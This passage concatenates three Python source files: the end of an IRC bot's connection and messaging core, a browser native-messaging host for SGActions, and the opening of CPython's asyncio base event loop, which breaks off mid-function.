# will release the main thread. This should be called last to avoid
# race conditions.
self.close()
def part(self, channel, msg=None):
"""Part a channel."""
self.write(['PART', channel], msg)
def join(self, channel, password=None):
"""Join a channel
If `channel` contains a space, and no `password` is given, the space is
assumed to split the argument into the channel to join and its
password. `channel` should not contain a space if `password` is given.
"""
if password is None:
self.write(('JOIN', channel))
else:
self.write(['JOIN', channel, password])
def handle_connect(self):
if self.config.core.use_ssl and has_ssl:
if not self.config.core.verify_ssl:
self.ssl = ssl.wrap_socket(self.socket,
do_handshake_on_connect=True,
suppress_ragged_eofs=True)
else:
self.ssl = ssl.wrap_socket(self.socket,
do_handshake_on_connect=True,
suppress_ragged_eofs=True,
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=self.ca_certs)
try:
ssl.match_hostname(self.ssl.getpeercert(), self.config.host)
except ssl.CertificateError:
stderr("Invalid certficate, hostname mismatch!")
os.unlink(self.config.pid_file_path)
os._exit(1)
self.set_socket(self.ssl)
# Request list of server capabilities. IRCv3 servers will respond with
# CAP * LS (which we handle in coretasks). v2 servers will respond with
# 421 Unknown command, which we'll ignore
self.write(('CAP', 'LS'))
if self.config.core.server_password is not None:
self.write(('PASS', self.config.core.server_password))
self.write(('NICK', self.nick))
self.write(('USER', self.user, '+iw', self.nick), self.name)
stderr('Connected.')
self.last_ping_time = datetime.now()
timeout_check_thread = threading.Thread(target=self._timeout_check)
timeout_check_thread.start()
ping_thread = threading.Thread(target=self._send_ping)
ping_thread.start()
def _timeout_check(self):
while self.connected or self.connecting:
if (datetime.now() - self.last_ping_time).seconds > int(self.config.timeout):
stderr('Ping timeout reached after %s seconds, closing connection' % self.config.timeout)
self.handle_close()
break
else:
time.sleep(int(self.config.timeout))
def _send_ping(self):
while self.connected or self.connecting:
if self.connected and (datetime.now() - self.last_ping_time).seconds > int(self.config.timeout) / 2:
try:
self.write(('PING', self.config.host))
except socket.error:
pass
time.sleep(int(self.config.timeout) / 2)
def _ssl_send(self, data):
"""Replacement for self.send() during SSL connections."""
try:
result = self.socket.send(data)
return result
except ssl.SSLError as why:
if why[0] in (asyncore.EWOULDBLOCK, errno.ESRCH):
return 0
else:
raise why
return 0
def _ssl_recv(self, buffer_size):
"""Replacement for self.recv() during SSL connections.
From: http://evanfosmark.com/2010/09/ssl-support-in-asynchatasync_chat
"""
try:
data = self.socket.read(buffer_size)
if not data:
self.handle_close()
return ''
return data
except ssl.SSLError as why:
if why[0] in (asyncore.ECONNRESET, asyncore.ENOTCONN,
asyncore.ESHUTDOWN):
self.handle_close()
return ''
elif why[0] == errno.ENOENT:
# Required in order to keep it non-blocking
return ''
else:
raise
def collect_incoming_data(self, data):
# We can't trust clients to pass valid unicode.
try:
data = unicode(data, encoding='utf-8')
except UnicodeDecodeError:
# not unicode, let's try cp1252
try:
data = unicode(data, encoding='cp1252')
except UnicodeDecodeError:
# Okay, let's try ISO8859-1
try:
data = unicode(data, encoding='iso8859-1')
except:
# Discard line if encoding is unknown
return
if data:
self.log_raw(data, '<<')
self.buffer += data
def found_terminator(self):
line = self.buffer
if line.endswith('\r'):
line = line[:-1]
self.buffer = ''
self.raw = line
# Break off IRCv3 message tags, if present
tags = {}
if line.startswith('@'):
tagstring, line = line.split(' ', 1)
for tag in tagstring[1:].split(';'):
tag = tag.split('=', 1)
if len(tag) > 1:
tags[tag[0]] = tag[1]
else:
tags[tag[0]] = None
if line.startswith(':'):
source, line = line[1:].split(' ', 1)
else:
source = None
if ' :' in line:
argstr, text = line.split(' :', 1)
args = argstr.split(' ')
args.append(text)
else:
args = line.split(' ')
text = args[-1]
self.last_ping_time = datetime.now()
if args[0] == 'PING':
self.write(('PONG', text))
elif args[0] == 'ERROR':
self.debug(__file__, text, 'always')
if self.hasquit:
self.close_when_done()
elif args[0] == '433':
stderr('Nickname already in use!')
self.handle_close()
origin = Origin(self, source, args, tags)
self.dispatch(origin, text, args)
def dispatch(self, origin, text, args):
pass
def msg(self, recipient, text, max_messages=1):
# We're arbitrarily saying that the max is 400 bytes of text when
# messages will be split. Otherwise, we'd have to acocunt for the bot's
# hostmask, which is hard.
max_text_length = 400
# Encode to bytes, for propper length calculation
if isinstance(text, unicode):
encoded_text = text.encode('utf-8')
else:
encoded_text = text
excess = ''
if max_messages > 1 and len(encoded_text) > max_text_length:
last_space = encoded_text.rfind(' ', 0, max_text_length)
if last_space == -1:
excess = encoded_text[max_text_length:]
encoded_text = encoded_text[:max_text_length]
else:
excess = encoded_text[last_space + 1:]
encoded_text = encoded_text[:last_space]
# We'll then send the excess at the end
# Back to unicode again, so we don't screw things up later.
text = encoded_text.decode('utf-8')
try:
self.sending.acquire()
# No messages within the last 3 seconds? Go ahead!
# Otherwise, wait so it's been at least 0.8 seconds + penalty
recipient_id = Nick(recipient)
if recipient_id not in self.stack:
self.stack[recipient_id] = []
elif self.stack[recipient_id]:
elapsed = time.time() - self.stack[recipient_id][-1][0]
if elapsed < 3:
penalty = float(max(0, len(text) - 50)) / 70
wait = 0.7 + penalty
if elapsed < wait:
time.sleep(wait - elapsed)
# Loop detection
messages = [m[1] for m in self.stack[recipient_id][-8:]]
# If what we about to send repeated at least 5 times in the
# last 2 minutes, replace with '...'
if messages.count(text) >= 5 and elapsed < 120:
text = '...'
if messages.count('...') >= 3:
# If we said '...' 3 times, discard message
return
self.write(('PRIVMSG', recipient), text)
self.stack[recipient_id].append((time.time(), self.safe(text)))
self.stack[recipient_id] = self.stack[recipient_id][-10:]
finally:
self.sending.release()
# Now that we've sent the first part, we need to send the rest. Doing
# this recursively seems easier to me than iteratively
if excess:
self.msg(recipient, excess, max_messages - 1)
def notice(self, dest, text):
"""Send an IRC NOTICE to a user or a channel.
See IRC protocol documentation for more information.
"""
self.write(('NOTICE', dest), text)
def error(self, origin=None, trigger=None):
"""Called internally when a module causes an error."""
try:
trace = traceback.format_exc()
if sys.version_info.major < 3:
trace = trace.decode('utf-8', errors='xmlcharrefreplace')
stderr(trace)
try:
lines = list(reversed(trace.splitlines()))
report = [lines[0].strip()]
for line in lines:
line = line.strip()
if line.startswith('File "'):
report.append(line[0].lower() + line[1:])
break
else:
report.append('source unknown')
signature = '%s (%s)' % (report[0], report[1])
# TODO: make not hardcoded
log_filename = os.path.join(self.config.logdir, 'exceptions.log')
with codecs.open(log_filename, 'a', encoding='utf-8') as logfile:
logfile.write('Signature: %s\n' % signature)
if origin:
logfile.write('from %s at %s:\n' % (origin.sender, str(datetime.now())))
if trigger:
logfile.write('Message was: <%s> %s\n' % (trigger.nick, trigger.group(0)))
logfile.write(trace)
logfile.write(
'----------------------------------------\n\n'
)
except Exception as e:
stderr("Could not save full traceback!")
self.debug(__file__, "(From: " + origin.sender + "), can't save traceback: " + str(e), 'always')
if origin:
self.msg(origin.sender, signature)
except Exception as e:
if origin:
self.msg(origin.sender, "Got an error.")
self.debug(__file__, "(From: " + origin.sender + ") " + str(e), 'always')
def handle_error(self):
"""Handle any uncaptured error in the core.
Overrides asyncore's handle_error.
"""
trace = traceback.format_exc()
stderr(trace)
self.debug(
__file__,
'Fatal error in core, please review exception log',
'always'
)
# TODO: make not hardcoded
logfile = codecs.open(
os.path.join(self.config.logdir, 'exceptions.log'),
'a',
encoding='utf-8'
)
logfile.write('Fatal error in core, handle_error() was called\n')
logfile.write('last raw line was %s' % self.raw)
logfile.write(trace)
logfile.write('Buffer:\n')
logfile.write(self.buffer)
logfile.write('----------------------------------------\n\n')
logfile.close()
if self.error_count > 10:
if (datetime.now() - self.last_error_timestamp).seconds < 5:
print >> sys.stderr, "Too many errors, can't continue"
os._exit(1)
self.last_error_timestamp = datetime.now()
self.error_count = self.error_count + 1
if self.config.exit_on_error:
os._exit(1)
# Helper functions to maintain the oper list.
# They cast to Nick when adding to be quite sure there aren't any accidental
# string nicks. On deletion, you know you'll never need to worry about what
# the real superclass is, so we just cast and remove.
def add_op(self, channel, name):
if isinstance(name, Nick):
self.ops[channel].add(name)
else:
self.ops[channel].add(Nick(name))
def add_halfop(self, channel, name):
if isinstance(name, Nick):
self.halfplus[channel].add(name)
else:
self.halfplus[channel].add(Nick(name))
def add_voice(self, channel, name):
if isinstance(name, Nick):
self.voices[channel].add(name)
else:
self.voices[channel].add(Nick(name))
def del_op(self, channel, name):
self.ops[channel].discard(Nick(name))
def del_halfop(self, channel, name):
self.halfplus[channel].discard(Nick(name))
def del_voice(self, channel, name):
self.voices[channel].discard(Nick(name))
def flush_ops(self, channel):
self.ops[channel] = set()
self.halfplus[channel] = set()
self.voices[channel] = set()
def init_ops_list(self, channel):
if channel not in self.halfplus:
self.halfplus[channel] = set()
if channel not in self.ops:
self.ops[channel] = set()
if channel not in self.voices:
self.voices[channel] = set()
|
core.py
|
#!/usr/bin/env python
from Queue import Queue
from warnings import warn
import functools
import json
import os
import re
import struct
import subprocess
import sys
import threading
import traceback
import weakref
from sgactions.dispatch import dispatch as _dispatch
def log(*args):
sys.stderr.write('[SGActions] %s\n' % ' '.join(str(x) for x in args))
sys.stderr.flush()
# We need to keep checking for this as long as the old Firefox plugin is
# in the wild.
_line_based = os.environ.get('SGACTIONS_HOST') == 'Firefox'
_capabilities = {}
_handlers = {}
_threads = weakref.WeakValueDictionary()
_local = threading.local()
def reply(orig, **msg):
msg['dst'] = orig.get('src') or orig
send(**msg)
def send(**msg):
msg['src'] = 'native'
encoded_msg = json.dumps(msg)
log('send', len(encoded_msg), encoded_msg)
if _line_based:
sys.__stdout__.write(encoded_msg + '\n')
else:
sys.__stdout__.write(struct.pack('I', len(encoded_msg)))
sys.__stdout__.write(encoded_msg)
sys.__stdout__.flush()
def format_exception(e):
return dict(type='error', error_type=e.__class__.__name__, error=str(e))
def reply_exception(orig, e):
reply(orig, **format_exception(e))
def handler(func, name=None):
if isinstance(func, basestring):
return functools.partial(handler, name=func)
_handlers[name or func.__name__] = func
return func
@handler
def hello(capabilities=None, **kw):
_capabilities.update(capabilities or {})
reply(kw,
type='elloh',
capabilities={'dispatch': True},
executable=sys.executable,
script=__file__,
native=os.environ.get('SGACTIONS_NATIVE'),
origin=os.environ.get('SGACTIONS_ORIGIN'),
host=os.environ.get('SGACTIONS_HOST'),
)
@handler
def elloh(**kw):
pass
@handler
def ping(**req):
res = req.copy()
res['type'] = 'pong'
reply(req, res)
@handler
def pong(**kw):
pass
@handler
def dispatch(entrypoint=None, kwargs=None, url=None, **kw):
# We must respect the old URL method until the legacy Chrome/Firefox addon is gone.
log('dispatching:', entrypoint or url)
res = _dispatch(entrypoint=entrypoint, kwargs=kwargs, url=url, reload=None)
if isinstance(res, Exception):
reply_exception(kw, res)
else:
reply(kw, type='result', result=res)
def send_and_recv(**kwargs):
session = current_session()
queue = session.get('result_queue')
if not queue:
queue = session['result_queue'] = Queue(1)
timeout = kwargs.pop('timeout', 300)
send(dst=session['src'], session_token=session['token'], **kwargs)
reply = queue.get(timeout=timeout)
log('async response:', repr(reply))
return reply
@handler
def user_response(session_token, **kw):
thread = _threads.get(session_token)
if not thread:
raise ValueError('no matching thread', session_token)
session = thread.session
queue = session.get('result_queue')
if not queue:
raise ValueError('session not expecting result', session_token)
queue.put(kw, block=False)
def main():
# We need to take over stdout so that print statements don't result in the
# browser thinking it is getting a message back.
sys.stdout = open('/tmp/sgactions.native.log', 'a')
dispatch_counter = 0
log('entering main loop')
while True:
try:
if _line_based:
raw_msg = sys.stdin.readline()
if not raw_msg:
log('native port closed')
break
else:
raw_size = sys.stdin.read(4)
if not raw_size:
log('native port closed')
break
size, = struct.unpack('I', raw_size)
log('reading message of size', raw_size)
raw_msg = sys.stdin.read(size)
msg = json.loads(raw_msg)
except Exception as e:
traceback.print_exc()
send(**format_exception(e))
continue
if len(_threads):
log('%d sessions already open' % len(_threads))
if msg.get('type') not in _handlers:
reply(msg, type='error', error='unknown message type %r' % msg.get('type'))
log('unknown message type: %s' % msg.get('type'))
dispatch_counter += 1
thread = _threads[dispatch_counter] = threading.Thread(target=_dispatch_target, args=[msg])
thread.daemon = True
thread.session = {
'type': msg['type'],
'src': msg.get('src'),
'token': dispatch_counter,
}
thread.start()
del thread # Kill this reference immediately.
def current_session(strict=True):
try:
return threading.current_thread().session
except AttributeError:
if strict:
raise RuntimeError('no current native handler')
def _dispatch_target(msg):
try:
_handlers[msg['type']](**msg)
except Exception as e:
traceback.print_exc()
try:
reply_exception(msg, e)
except Exception as e:
# Just in case it is the exception reporting mechanism...
log('exception during reply_exception')
traceback.print_exc()
|
base_events.py
|
"""Base implementation of event loop.
The event loop can be broken up into a multiplexer (the part
responsible for notifying us of I/O events) and the event loop proper,
which wraps a multiplexer with functionality for scheduling callbacks,
immediately or at a given time in the future.
Whenever a public API takes a callback, subsequent positional
arguments will be passed to the callback if/when it is called. This
avoids the proliferation of trivial lambdas implementing closures.
Keyword arguments for the callback are not supported; this is a
conscious design decision, leaving the door open for keyword arguments
to modify the meaning of the API call itself.
"""
import collections
import collections.abc
import concurrent.futures
import functools
import heapq
import itertools
import os
import socket
import stat
import subprocess
import threading
import time
import traceback
import sys
import warnings
import weakref
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from . import constants
from . import coroutines
from . import events
from . import exceptions
from . import futures
from . import protocols
from . import sslproto
from . import staggered
from . import tasks
from . import transports
from . import trsock
from .log import logger
__all__ = 'BaseEventLoop','Server',
# Minimum number of _scheduled timer handles before cleanup of
# cancelled handles is performed.
_MIN_SCHEDULED_TIMER_HANDLES = 100
# Minimum fraction of _scheduled timer handles that are cancelled
# before cleanup of cancelled handles is performed.
_MIN_CANCELLED_TIMER_HANDLES_FRACTION = 0.5
_HAS_IPv6 = hasattr(socket, 'AF_INET6')
# Maximum timeout passed to select to avoid OS limitations
MAXIMUM_SELECT_TIMEOUT = 24 * 3600
def _format_handle(handle):
cb = handle._callback
if isinstance(getattr(cb, '__self__', None), tasks.Task):
# format the task
return repr(cb.__self__)
else:
return str(handle)
def _format_pipe(fd):
if fd == subprocess.PIPE:
return '<pipe>'
elif fd == subprocess.STDOUT:
return '<stdout>'
else:
return repr(fd)
def _set_reuseport(sock):
if not hasattr(socket, 'SO_REUSEPORT'):
raise ValueError('reuse_port not supported by socket module')
else:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
except OSError:
raise ValueError('reuse_port not supported by socket module, '
'SO_REUSEPORT defined but not implemented.')
def _ipaddr_info(host, port, family, type, proto, flowinfo=0, scopeid=0):
# Try to skip getaddrinfo if "host" is already an IP. Users might have
# handled name resolution in their own code and pass in resolved IPs.
if not hasattr(socket, 'inet_pton'):
return
if proto not in {0, socket.IPPROTO_TCP, socket.IPPROTO_UDP} or \
host is None:
return None
if type == socket.SOCK_STREAM:
proto = socket.IPPROTO_TCP
elif type == socket.SOCK_DGRAM:
proto = socket.IPPROTO_UDP
else:
return None
if port is None:
port = 0
elif isinstance(port, bytes) and port == b'':
port = 0
elif isinstance(port, str) and port == '':
port = 0
else:
# If port's a service name like "http", don't skip getaddrinfo.
try:
port = int(port)
except (TypeError, ValueError):
return None
if family == socket.AF_UNSPEC:
afs = [socket.AF_INET]
if _HAS_IPv6:
afs.append(socket.AF_INET6)
else:
afs = [family]
if isinstance(host, bytes):
host = host.decode('idna')
if '%' in host:
# Linux's inet_pton doesn't accept an IPv6 zone index after host,
# like '::1%lo0'.
return None
for af in afs:
try:
socket.inet_pton(af, host)
# The host has already been resolved.
if _HAS_IPv6 and af == socket.AF_INET6:
return af, type, proto, '', (host, port, flowinfo, scopeid)
else:
return af, type, proto, '', (host, port)
except OSError:
pass
# "host" is not an IP address.
return None
def _interleave_addrinfos(addrinfos, first_address_family_count=1):
"""Interleave list of addrinfo tuples by family."""
# Group addresses by family
addrinfos_by_family = collections.OrderedDict()
for addr in addrinfos:
family = addr[0]
if family not in addrinfos_by_family:
addrinfos_by_family[family] = []
addrinfos_by_family[family].append(addr)
addrinfos_lists = list(addrinfos_by_family.values())
reordered = []
if first_address_family_count > 1:
reordered.extend(addrinfos_lists[0][:first_address_family_count - 1])
del addrinfos_lists[0][:first_address_family_count - 1]
reordered.extend(
a for a in itertools.chain.from_iterable(
itertools.zip_longest(*addrinfos_lists)
) if a is not None)
return reordered
def _run_until_complete_cb(fut):
if not fut.cancelled():
exc = fut.exception()
if isinstance(exc, (SystemExit, KeyboardInterrupt)):
# Issue #22429: run_forever() already finished, no need to
# stop it.
return
futures._get_loop(fut).stop()
if hasattr(socket, 'TCP_NODELAY'):
def _set_nodelay(sock):
if (sock.family in {socket.AF_INET, socket.AF_INET6} and
sock.type == socket.SOCK_STREAM and
sock.proto == socket.IPPROTO_TCP):
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
else:
def _set_nodelay(sock):
pass
def _check_ssl_socket(sock):
if ssl is not None and isinstance(sock, ssl.SSLSocket):
raise TypeError("Socket cannot be of type SSLSocket")
class _SendfileFallbackProtocol(protocols.Protocol):
def __init__(self, transp):
if not isinstance(transp, transports._FlowControlMixin):
raise TypeError("transport should be _FlowControlMixin instance")
self._transport = transp
self._proto = transp.get_protocol()
self._should_resume_reading = transp.is_reading()
self._should_resume_writing = transp._protocol_paused
transp.pause_reading()
transp.set_protocol(self)
if self._should_resume_writing:
self._write_ready_fut = self._transport._loop.create_future()
else:
self._write_ready_fut = None
async def drain(self):
if self._transport.is_closing():
raise ConnectionError("Connection closed by peer")
fut = self._write_ready_fut
if fut is None:
return
await fut
def connection_made(self, transport):
raise RuntimeError("Invalid state: "
"connection should have been established already.")
def connection_lost(self, exc):
if self._write_ready_fut is not None:
# Never happens if peer disconnects after sending the whole content
# Thus disconnection is always an exception from user perspective
if exc is None:
self._write_ready_fut.set_exception(
ConnectionError("Connection is closed by peer"))
else:
self._write_ready_fut.set_exception(exc)
self._proto.connection_lost(exc)
def pause_writing(self):
if self._write_ready_fut is not None:
return
self._write_ready_fut = self._transport._loop.create_future()
def resume_writing(self):
if self._write_ready_fut is None:
return
self._write_ready_fut.set_result(False)
self._write_ready_fut = None
def data_received(self, data):
raise RuntimeError("Invalid state: reading should be paused")
def eof_received(self):
raise RuntimeError("Invalid state: reading should be paused")
async def restore(self):
self._transport.set_protocol(self._proto)
if self._should_resume_reading:
self._transport.resume_reading()
if self._write_ready_fut is not None:
# Cancel the future.
# Basically it has no effect because protocol is switched back,
# no code should wait for it anymore.
self._write_ready_fut.cancel()
if self._should_resume_writing:
self._proto.resume_writing()
class Server(events.AbstractServer):
def __init__(self, loop, sockets, protocol_factory, ssl_context, backlog,
ssl_handshake_timeout, ssl_shutdown_timeout=None):
self._loop = loop
self._sockets = sockets
self._active_count = 0
self._waiters = []
self._protocol_factory = protocol_factory
self._backlog = backlog
self._ssl_context = ssl_context
self._ssl_handshake_timeout = ssl_handshake_timeout
self._ssl_shutdown_timeout = ssl_shutdown_timeout
self._serving = False
self._serving_forever_fut = None
def __repr__(self):
return f'<{self.__class__.__name__} sockets={self.sockets!r}>'
def _attach(self):
assert self._sockets is not None
self._active_count += 1
def _detach(self):
assert self._active_count > 0
self._active_count -= 1
if self._active_count == 0 and self._sockets is None:
self._wakeup()
def _wakeup(self):
waiters = self._waiters
self._waiters = None
for waiter in waiters:
if not waiter.done():
waiter.set_result(waiter)
def _start_serving(self):
if self._serving:
return
self._serving = True
for sock in self._sockets:
sock.listen(self._backlog)
self._loop._start_serving(
self._protocol_factory, sock, self._ssl_context,
self, self._backlog, self._ssl_handshake_timeout,
self._ssl_shutdown_timeout)
def get_loop(self):
return self._loop
def is_serving(self):
return self._serving
@property
def sockets(self):
if self._sockets is None:
return ()
return tuple(trsock.TransportSocket(s) for s in self._sockets)
def close(self):
sockets = self._sockets
if sockets is None:
return
self._sockets = None
for sock in sockets:
self._loop._stop_serving(sock)
self._serving = False
if (self._serving_forever_fut is not None and
not self._serving_forever_fut.done()):
self._serving_forever_fut.cancel()
self._serving_forever_fut = None
if self._active_count == 0:
self._wakeup()
async def start_serving(self):
self._start_serving()
# Skip one loop iteration so that all 'loop.add_reader'
# go through.
await tasks.sleep(0)
async def serve_forever(self):
if self._serving_forever_fut is not None:
raise RuntimeError(
f'server {self!r} is already being awaited on serve_forever()')
if self._sockets is None:
raise RuntimeError(f'server {self!r} is closed')
self._start_serving()
self._serving_forever_fut = self._loop.create_future()
try:
await self._serving_forever_fut
except exceptions.CancelledError:
try:
self.close()
await self.wait_closed()
finally:
raise
finally:
self._serving_forever_fut = None
async def wait_closed(self):
if self._sockets is None or self._waiters is None:
return
waiter = self._loop.create_future()
self._waiters.append(waiter)
await waiter
class BaseEventLoop(events.AbstractEventLoop):
def __init__(self):
self._timer_cancelled_count = 0
self._closed = False
self._stopping = False
self._ready = collections.deque()
self._scheduled = []
self._default_executor = None
self._internal_fds = 0
# Identifier of the thread running the event loop, or None if the
# event loop is not running
self._thread_id = None
self._clock_resolution = time.get_clock_info('monotonic').resolution
self._exception_handler = None
self.set_debug(coroutines._is_debug_mode())
# In debug mode, if the execution of a callback or a step of a task
# exceed this duration in seconds, the slow callback/task is logged.
self.slow_callback_duration = 0.1
self._current_handle = None
self._task_factory = None
self._coroutine_origin_tracking_enabled = False
self._coroutine_origin_tracking_saved_depth = None
# A weak set of all asynchronous generators that are
# being iterated by the loop.
self._asyncgens = weakref.WeakSet()
# Set to True when `loop.shutdown_asyncgens` is called.
self._asyncgens_shutdown_called = False
# Set to True when `loop.shutdown_default_executor` is called.
self._executor_shutdown_called = False
def __repr__(self):
return (
f'<{self.__class__.__name__} running={self.is_running()} '
f'closed={self.is_closed()} debug={self.get_debug()}>'
)
def create_future(self):
"""Create a Future object attached to the loop."""
return futures.Future(loop=self)
def create_task(self, coro, *, name=None, context=None):
"""Schedule a coroutine object.
Return a task object.
"""
self._check_closed()
if self._task_factory is None:
task = tasks.Task(coro, loop=self, name=name, context=context)
if task._source_traceback:
del task._source_traceback[-1]
else:
if context is None:
# Use legacy API if context is not needed
task = self._task_factory(self, coro)
else:
task = self._task_factory(self, coro, context=context)
tasks._set_task_name(task, name)
return task
def set_task_factory(self, factory):
"""Set a task factory that will be used by loop.create_task().
If factory is None the default task factory will be set.
If factory is a callable, it should have a signature matching
'(loop, coro)', where 'loop' will be a reference to the active
event loop, 'coro' will be a coroutine object. The callable
must return a Future.
"""
if factory is not None and not callable(factory):
raise TypeError('task factory must be a callable or None')
self._task_factory = factory
def get_task_factory(self):
"""Return a task factory, or None if the default one is in use."""
return self._task_factory
def _make_socket_transport(self, sock, protocol, waiter=None, *,
extra=None, server=None):
"""Create socket transport."""
raise NotImplementedError
def _make_ssl_transport(
self, rawsock, protocol, sslcontext, waiter=None,
*, server_side=False, server_hostname=None,
extra=None, server=None,
ssl_handshake_timeout=None,
ssl_shutdown_timeout=None,
call_connection_made=True):
"""Create SSL transport."""
raise NotImplementedError
def _make_datagram_transport(self, sock, protocol,
address=None, waiter=None, extra=None):
"""Create datagram transport."""
raise NotImplementedError
def _make_read_pipe_transport(self, pipe, protocol, waiter=None,
extra=None):
"""Create read pipe transport."""
raise NotImplementedError
def _make_write_pipe_transport(self, pipe, protocol, waiter=None,
extra=None):
"""Create write pipe transport."""
raise NotImplementedError
async def _make_subprocess_transport(self, protocol, args, shell,
stdin, stdout, stderr, bufsize,
extra=None, **kwargs):
"""Create subprocess transport."""
raise NotImplementedError
def _write_to_self(self):
"""Write a byte to self-pipe, to wake up the event loop.
This may be called from a different thread.
The subclass is responsible for implementing the self-pipe.
"""
raise NotImplementedError
def _process_events(self, event_list):
"""Process selector events."""
raise NotImplementedError
def _check_closed(self):
if self._closed:
raise RuntimeError('Event loop is closed')
def _check_default_executor(self):
if self._executor_shutdown_called:
raise RuntimeError('Executor shutdown has been called')
def _asyncgen_finalizer_hook(self, agen):
self._asyncgens.discard(agen)
if not self.is_closed():
self.call_soon_threadsafe(self.create_task, agen.aclose())
def _asyncgen_firstiter_hook(self, agen):
if self._asyncgens_shutdown_called:
warnings.warn(
f"asynchronous generator {agen!r} was scheduled after "
f"loop.shutdown_asyncgens() call",
ResourceWarning, source=self)
self._asyncgens.add(agen)
async def shutdown_asyncgens(self):
"""Shutdown all active asynchronous generators."""
self._asyncgens_shutdown_called = True
if not len(self._asyncgens):
# If Python version is <3.6 or we don't have any asynchronous
# generators alive.
return
closing_agens = list(self._asyncgens)
self._asyncgens.clear()
results = await tasks.gather(
*[ag.aclose() for ag in closing_agens],
return_exceptions=True)
for result, agen in zip(results, closing_agens):
if isinstance(result, Exception):
self.call_exception_handler({
'message': f'an error occurred during closing of '
f'asynchronous generator {agen!r}',
'exception': result,
'asyncgen': agen
})
async def shutdown_default_executor(self):
"""Schedule the shutdown of the default executor."""
self._executor_shutdown_called = True
if self._default_executor is None:
return
future = self.create_future()
thread = threading.Thread(target=self._do_shutdown, args=(future,))
thread.start()
try:
await future
finally:
thread.join()
def _do_shutdown(self, future):
try:
self._default_executor.shutdown(wait=True)
self.call_soon_threadsafe(future.set_result, None)
except Exception as ex:
self.call_soon_threadsafe(future.set_exception, ex)
def _check_running(self):
if self.is_running():
raise RuntimeError('This event loop is already running')
if events._get_running_loop() is not None:
raise RuntimeError(
'Cannot run the event loop while another loop is running')
def run_forever(self):
"""Run until stop() is called."""
self._check_closed()
self._check_running()
self._set_coroutine_origin_tracking(self._debug)
self._thread_id = threading.get_ident()
old_agen_hooks = sys.get_asyncgen_hooks()
sys.set_asyncgen_hooks(firstiter=self._asyncgen_firstiter_hook,
finalizer=self._asyncgen_finalizer_hook)
try:
events._set_running_loop(self)
while True:
self._run_once()
if self._stopping:
break
finally:
self._stopping = False
self._thread_id = None
events._set_running_loop(None)
self._set_coroutine_origin_tracking(False)
sys.set_asyncgen_hooks(*old_agen_hooks)
def run_until_complete(self, future):
"""Run until the Future is done.
If the argument is a coroutine, it is wrapped in a Task.
WARNING: It would be disastrous to call run_until_complete()
with the same coroutine twice -- it would wrap it in two
different Tasks and that can't be good.
Return the Future's result, or raise its exception.
"""
self._check_closed()
self._check_running()
new_task = not futures.isfuture(future)
future = tasks.ensure_future(future, loop=self)
if new_task:
# An exception is raised if the future didn't complete, so there
# is no need to log the "destroy pending task" message
future._log_destroy_pending = False
future.add_done_callback(_run_until_complete_cb)
try:
self.run_forever()
except:
if new_task and future.done() and not future.cancelled():
# The coroutine raised a BaseException. Consume the exception
# to not log a warning, the caller doesn't have access to the
# local task.
future.exception()
raise
finally:
future.remove_done_callback(_run_until_complete_cb)
if not future.done():
raise RuntimeError('Event loop stopped before Future completed.')
return future.result()
def stop(self):
"""Stop running the event loop.
Every callback already scheduled will still run. This simply informs
run_forever to stop looping after a complete iteration.
"""
self._stopping = True
def close(self):
"""Close the event loop.
This clears the queues and shuts down the executor,
but does not wait for the executor to finish.
The event loop must not be running.
"""
if self.is_running():
raise RuntimeError("Cannot close a running event loop")
if self._closed:
return
if self._debug:
logger.debug("Close %r", self)
self._closed = True
self._ready.clear()
self._scheduled.clear()
self._executor_shutdown_called = True
executor = self._default_executor
if executor is not None:
self._default_executor = None
executor.shutdown(wait=False)
def is_closed(self):
"""Returns True if the event loop was closed."""
return self._closed
def __del__(self, _warn=warnings.warn):
if not self.is_closed():
_warn(f"unclosed event loop {self!r}", ResourceWarning, source=self)
if not self.is_running():
self.close()
def is_running(self):
"""Returns True if the event loop is running."""
return (self._thread_id is not None)
def time(self):
"""Return the time according to the event loop's clock.
This is a float expressed in seconds since an epoch, but the
epoch, precision, accuracy and drift are unspecified and may
differ per event loop.
"""
return time.monotonic()
def call_later(self, delay, callback, *args, context=None):
"""Arrange for a callback to be called at a given time.
Return a Handle: an opaque object with a cancel() method that
can be used to cancel the call.
The delay can be an int or float, expressed in seconds. It is
always relative to the current time.
Each callback will be called exactly once. If two callbacks
are scheduled for exactly the same time, it undefined which
will be called first.
Any positional arguments after the callback will be passed to
the callback when it is called.
"""
if delay is None:
raise TypeError('delay must not be None')
timer = self.call_at(self.time() + delay, callback, *args,
context=context)
if timer._source_traceback:
del timer._source_traceback[-1]
return timer
def call_at(self, when, callback, *args, context=None):
"""Like call_later(), but uses an absolute time.
Absolute time corresponds to the event loop's time() method.
"""
if when is None:
raise TypeError("when cannot be None")
self._check_closed()
if self._debug:
self._check_thread()
self._check_callback(callback, 'call_at')
timer = events.TimerHandle(when, callback, args, self, context)
if timer._source_traceback:
del timer._source_traceback[-1]
heapq.heappush(self._scheduled, timer)
timer._scheduled = True
return timer
def call_soon(self, callback, *args, context=None):
"""Arrange for a callback to be called as soon as possible.
This operates as a FIFO queue: callbacks are called in the
order in which they are registered. Each callback will be
called exactly once.
Any positional arguments after the callback will be passed to
the callback when it is called.
"""
self._check_closed()
if self._debug:
self._check_thread()
self._check_callback(callback, 'call_soon')
handle = self._call_soon(callback, args, context)
if handle._source_traceback:
del handle._source_traceback[-1]
return handle
def _check_callback(self, callback, method):
if (coroutines.iscoroutine(callback) or
coroutines.iscoroutinefunction(callback)):
raise TypeError(
f"coroutines cannot be used with {method}()")
if not callable(callback):
raise TypeError(
f'a callable object was expected by {method}(), '
f'got {callback!r}')
def _call_soon(self, callback, args, context):
handle = events.Handle(callback, args, self, context)
if handle._source_traceback:
del handle._source_traceback[-1]
self._ready.append(handle)
return handle
def _check_thread(self):
"""Check that the current thread is the thread running the event loop.
Non-thread-safe methods of this class make this assumption and will
likely behave incorrectly when the assumption is violated.
Should only be called when (self._debug == True). The caller is
responsible for checking this condition for performance reasons.
"""
if self._thread_id is None:
return
thread_id = threading.get_ident()
if thread_id != self._thread_id:
raise RuntimeError(
"Non-thread-safe operation invoked on an event loop other "
"than the current one")
def call_soon_threadsafe(self, callback, *args, context=None):
"""Like call_soon(), but thread-safe."""
self._check_closed()
if self._debug:
self._check_callback(callback, 'call_soon_threadsafe')
handle = self._call_soon(callback, args, context)
if handle._source_traceback:
